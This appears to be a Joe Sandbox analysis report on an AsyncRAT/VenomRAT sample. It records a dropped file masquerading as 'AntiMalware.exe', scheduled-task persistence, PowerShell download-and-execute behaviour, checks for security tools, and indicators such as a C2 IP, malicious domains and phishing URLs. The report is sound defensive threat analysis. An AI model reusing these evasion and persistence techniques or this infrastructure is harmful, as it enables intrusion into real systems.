                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: ZzOTKK2V8l.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ZzOTKK2V8l.exe PID: 6368, type: MEMORYSTR
                            Source: ZzOTKK2V8l.exe, 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe.0.drBinary or memory string: MSASCui.exe
                            Source: ZzOTKK2V8l.exe, 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe.0.drBinary or memory string: procexp.exe
                            Source: ZzOTKK2V8l.exe, 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe.0.drBinary or memory string: MsMpEng.exe
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information11
                            Scripting                            		Valid Accounts131
                            Windows Management Instrumentation                            		11
                            Scripting                            		1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		1
                            File and Directory Discovery                            		Remote Services1
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API                            		1
                            DLL Side-Loading                            		12
                            Process Injection                            		211
                            Obfuscated Files or Information                            		LSASS Memory24
                            System Information Discovery                            		Remote Desktop Protocol1
                            Input Capture                            		1
                            Non-Standard Port                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Command and Scripting Interpreter                            		3
                            Scheduled Task/Job                            		3
                            Scheduled Task/Job                            		1
                            Software Packing                            		Security Account Manager1
                            Query Registry                            		SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts3
                            Scheduled Task/Job                            		Login HookLogin Hook1
                            DLL Side-Loading                            		NTDS441
                            Security Software Discovery                            		Distributed Component Object ModelInput Capture1
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts1
                            PowerShell                            		Network Logon ScriptNetwork Logon Script1
                            Masquerading                            		LSA Secrets2
                            Process Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials151
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447641 Sample: ZzOTKK2V8l.exe Startdate: 26/05/2024 Architecture: WINDOWS Score: 100 57 xcu5.exgaming.click 2->57 59 xcu.exgaming.click 2->59 61 bg.microsoft.map.fastly.net 2->61 71 Snort IDS alert for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 16 other signatures 2->77 10 ZzOTKK2V8l.exe 9 2->10         started        13 AntiMalware.exe 4 2->13         started        signatures3 process4 file5 55 C:\Users\user\AppData\...\AntiMalware.exe, PE32+ 10->55 dropped 16 cmd.exe 1 10->16         started        18 cmd.exe 1 10->18         started        21 cmd.exe 1 10->21         started        83 Antivirus detection for dropped file 13->83 85 Multi AV Scanner detection for dropped file 13->85 87 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->87 89 Machine Learning detection for dropped file 13->89 23 cmd.exe 13->23         started        signatures6 process7 signatures8 25 AntiMalware.exe 16->25         started        38 2 other processes 16->38 65 Suspicious powershell command line found 18->65 67 Tries to download and execute files (via powershell) 18->67 69 Uses schtasks.exe or at.exe to add and modify task schedules 18->69 28 powershell.exe 14 16 18->28         started        30 powershell.exe 16 18->30         started        32 powershell.exe 12 18->32         started        40 2 other processes 18->40 34 conhost.exe 21->34         started        36 schtasks.exe 1 21->36         started        42 5 other processes 23->42 process9 dnsIp10 63 94.156.65.172, 4449, 49704 TERASYST-ASBG Bulgaria 25->63 44 cmd.exe 25->44         started        process11 signatures12 79 Suspicious powershell command line found 44->79 81 Tries to download and execute files (via powershell) 44->81 47 conhost.exe 44->47         started        49 powershell.exe 44->49         started        51 powershell.exe 44->51         started        53 2 other processes 44->53 process13

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            ZzOTKK2V8l.exe50%ReversingLabsByteCode-MSIL.Trojan.AsyncRAT
                            ZzOTKK2V8l.exe55%VirustotalBrowse
                            ZzOTKK2V8l.exe100%AviraHEUR/AGEN.1313069
                            ZzOTKK2V8l.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Roaming\AntiMalware.exe100%AviraHEUR/AGEN.1313069
                            C:\Users\user\AppData\Roaming\AntiMalware.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\AntiMalware.exe50%ReversingLabsByteCode-MSIL.Trojan.AsyncRAT
                            C:\Users\user\AppData\Roaming\AntiMalware.exe55%VirustotalBrowse

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            SourceDetectionScannerLabelLink
                            bg.microsoft.map.fastly.net0%VirustotalBrowse
                            xcu5.exgaming.click0%VirustotalBrowse
                            xcu.exgaming.click0%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            bg.microsoft.map.fastly.net
                            		199.232.214.172
                            		truefalseunknown
                            xcu.exgaming.click
                            		unknown
                            		unknowntrueunknown
                            xcu5.exgaming.click
                            		unknown
                            		unknowntrueunknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.0000000003651000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.0000000003B27000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            94.156.65.172
                            		unknownBulgaria
                            		31420TERASYST-ASBGtrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1447641
                            Start date and time:2024-05-26 09:46:05 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 12s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:31
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Sample name:ZzOTKK2V8l.exe
                            renamed because original name is a hash value
                            Original Sample Name:c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@48/33@4/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 4
                            • Number of non-executed functions: 1
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 199.232.214.172
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            03:46:51API Interceptor75x Sleep call for process: powershell.exe modified
                            03:46:59API Interceptor16035966x Sleep call for process: AntiMalware.exe modified
                            09:46:53Task SchedulerRun new task: AntiMalware path: "C:\Users\user\AppData\Roaming\AntiMalware.exe"

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            bg.microsoft.map.fastly.netkczvA4dhKH.exeGet hashmaliciousRedLineBrowse
                            • 199.232.214.172
                            https://support-ads-team-34d19.firebaseapp.com/form-2122.htmlGet hashmaliciousUnknownBrowse
                            • 199.232.210.172
                            https://support-ads-team-34d19.web.app/form-2122.htmlGet hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            http://metamask-wallet.org/Get hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            http://worker-office-onedrive.td5xtn-b1lv7f1ymscd0.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                            • 199.232.210.172
                            https://roaring-starship.netlify.app/form.htmlGet hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            https://wsswsswsswss.github.io/myfirstswapGet hashmaliciousUnknownBrowse
                            • 199.232.210.172
                            http://cn435-douglas.pages.dev/Get hashmaliciousUnknownBrowse
                            • 199.232.210.172
                            https://page-violation-information-form.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                            • 199.232.210.172
                            https://www.onlinesiro.com.ar/wp-admin/css/colors/ocean/html/html/home/nkl-log.php/Get hashmaliciousUnknownBrowse
                            • 199.232.214.172

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            TERASYST-ASBGnF54KOU30R.exeGet hashmaliciousRHADAMANTHYSBrowse
                            • 94.156.67.91
                            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                            • 94.156.67.72
                            Swift mt103 483932024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                            • 94.156.67.228
                            1716402308262aedf7d56a024eb3c1ba5eacf734db4f110a1cdb89ce86eee5e5f3269b8667772.dat-decoded.exeGet hashmaliciousRemcosBrowse
                            • 94.156.69.96
                            5021036673.exeGet hashmaliciousNanocore, AgentTesla, PureLog StealerBrowse
                            • 94.156.68.219
                            hwUz69Q8ZN.exeGet hashmaliciousXWormBrowse
                            • 94.156.68.231
                            Swift copy.exeGet hashmaliciousXWormBrowse
                            • 94.156.68.231
                            IMG1024785000.exeGet hashmaliciousNanocore, AgentTesla, PureLog StealerBrowse
                            • 94.156.68.219
                            15qMoP89vl.elfGet hashmaliciousUnknownBrowse
                            • 94.156.68.228
                            ZQYQWLpDEQ.elfGet hashmaliciousMirai, OkiruBrowse
                            • 94.156.71.230

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                            Download File
                            Process:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            File Type:Unknown
                            Category:dropped
                            Size (bytes):69993
                            Entropy (8bit):7.99584879649948
                            Encrypted:true
                            SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                            MD5:29F65BA8E88C063813CC50A4EA544E93
                            SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                            SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                            SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                            Malicious:false
